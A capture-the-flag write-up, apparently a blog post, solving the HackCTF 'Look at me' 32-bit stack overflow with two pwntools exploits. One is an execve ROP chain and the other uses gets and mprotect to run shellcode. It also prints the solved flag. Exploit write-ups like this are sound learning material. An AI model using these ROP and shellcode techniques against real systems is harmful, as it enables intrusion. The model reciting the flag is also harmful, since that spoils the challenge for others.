[HackCTF / pwnable] Look at me
2019. 10. 15. 12:58ㆍWargame & CTF/HackCTF
Summary
32bit
Analysis
main
// Entry point (Hex-Rays output, so locals/types are the decompiler's guesses):
// makes stdout unbuffered, pins the gid, then calls the vulnerable look_at_me().
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v3; // ST1C_4
setvbuf(stdout, 0, 2, 0); // mode 2 == _IONBF: unbuffered stdout, presumably so the banner is flushed before gets()
v3 = getegid();
setresgid(v3, v3, v3); // real/effective/saved gid all set to the effective gid (usual setgid CTF wrapper)
look_at_me();
return 0;
}
look_at_me
// Reads one line with gets() into a 0x18-byte stack buffer with no length bound.
// This is the stack buffer overflow the rest of the page exploits: the checksec
// output below shows no stack canary, so bytes past the buffer reach the saved
// ebp and the return address unchecked. The fix is a bounded read such as
// fgets(buf, sizeof buf, stdin).
int look_at_me()
{
char v1; // [esp+0h] [ebp-18h]
puts("Hellooooooooooooooooooooo");
return gets(&v1); // unbounded: input beyond 0x18 + 4 bytes overwrites the return address
}
v1에서 버퍼오버플로우가 생긴다.
Exploit
from pwn import *
# Exploit 1 of 2: a ROP chain that writes "/bin/sh" into .data and invokes
# execve through int 0x80. Gadget addresses are fixed because the binary has
# no PIE (see the checksec output below); NX is enabled, so no stack shellcode.
# NOTE(review): this is Python 2 pwntools code -- concatenating str ("A"*...,
# "/bin") with the bytes p32() returns raises TypeError on Python 3.
e = ELF("./lookatme")
p = process("./lookatme")
movret = 0x080549db # mov dword ptr [edx], eax ; ret
popedx = 0x0806f02a  # pop edx ; ret (gadget roles follow the walkthrough below)
popeax = 0x080b81c6  # pop eax ; ret
popedxecxebx = 0x0806f050  # pop edx ; pop ecx ; pop ebx ; ret
int0x80 = 0x0806cc25  # int 0x80 gadget (syscall entry)
p.recvuntil("Hellooooooooooooooooooooo\n")  # the puts() banner printed by look_at_me()
payload = ""
payload += "A"*(0x18+0x4)  # fill the 0x18-byte buffer plus saved ebp; the next dword is the return address
payload += p32(popedx)
payload += p32(e.symbols["__data_start"])  # edx = start of .data (writable, fixed address)
payload += p32(popeax)
payload += "/bin"  # eax = the 4 raw bytes "/bin", popped as one dword
payload += p32(movret)  # [edx] = eax  ->  .data[0:4] = "/bin"
payload += p32(popedx)
payload += p32(e.symbols["__data_start"]+4)
payload += p32(popeax)
payload += "/sh\x00"  # eax = "/sh" plus the NUL that terminates the string
payload += p32(movret)  # .data[4:8] = "/sh\0"  ->  .data now holds "/bin/sh"
payload += p32(popedxecxebx)
payload += p32(0)  # edx = envp = NULL
payload += p32(0)  # ecx = argv = NULL
payload += p32(e.symbols["__data_start"])  # ebx = pathname = "/bin/sh" in .data
payload += p32(popeax)
payload += p32(11)  # eax = 11 = execve on i386
payload += p32(int0x80)  # execve("/bin/sh", NULL, NULL)
p.sendline(payload)
p.interactive()
edx에 data 시작주소를 넣어주고 eax에 "/bin"을 넣어준 후에 mov dword ptr [edx], eax ; ret을 하면 data시작주소에 /bin이 들어간다.
다시 edx에 data 시작주소 + 4를 넣고 eax에 "/sh\x00"를 넣어준 후 mov ret을 하면 data시작주소 + 4에 /sh\x00이 들어간다.
그리고 edx, ecx에 0, ebx에 data 시작주소를, eax에 execve syscall을 넣고 int 0x80을 하면 쉘이 뜬다.
from pwn import *
# Exploit 2 of 2: call in-binary functions instead of raw syscalls (gets and
# mprotect resolve as symbols of the binary, consistent with the static
# linking the flag text mentions). gets() drops shellcode into .bss,
# mprotect() marks that page RWX to bypass NX, then execution returns into it.
# NOTE(review): Python 2 only -- on Python 3 `e.bss() / 0x1000` is a float
# (p32() rejects it) and the str/bytes concatenation below raises TypeError.
e = ELF("./lookatme")
#p = process("./lookatme")
p = remote("ctf.j0n9hyun.xyz", 3017)
bss = e.bss() / 0x1000
bss *= 0x1000  # round .bss down to a page boundary; mprotect() needs a page-aligned address
pr = 0x080483ca  # pop ; ret -- clears one argument after a call (role inferred from the name and usage)
pppr = 0x080483c8  # pop ; pop ; pop ; ret -- clears three arguments
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"  # i386 execve shellcode; the pushed "/bin//sh" bytes are readable in the literal
payload = ""
payload += "A"*28  # 0x18-byte buffer + 4 bytes of saved ebp
payload += p32(e.symbols["gets"])  # gets(bss): reads the second sendline() below into .bss
payload += p32(pr)  # return address of gets(); pops its one argument
payload += p32(bss)
payload += p32(e.symbols["mprotect"])  # mprotect(bss, 0x8000, 7)
payload += p32(pppr)  # return address of mprotect(); pops its three arguments
payload += p32(bss)
payload += p32(0x8000)  # length
payload += p32(0x7)  # PROT_READ | PROT_WRITE | PROT_EXEC -- exactly what NX was denying
payload += p32(bss)  # after pppr, return into the now-executable shellcode
p.recvuntil("Hellooooooooooooooooooooo\n")
p.sendline(payload)
p.sendline(shellcode)  # consumed by the gets(bss) call in the chain
p.interactive()
gets로 bss 영역에 쉘코드를 넣어준다.
mprotect를 써서 해도 되지만 위에처럼 syscall을 쓰는 것이 좋다.
Flag
cg10036@cg10036-virtual-machine:~/hackCTF/Look_at_me$ p ex.py
[*] '/home/cg10036/hackCTF/Look_at_me/lookatme'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3017: Done
[*] Switching to interactive mode
$ cat flag
HackCTF{Did_you_understand_the_static_linking_method?}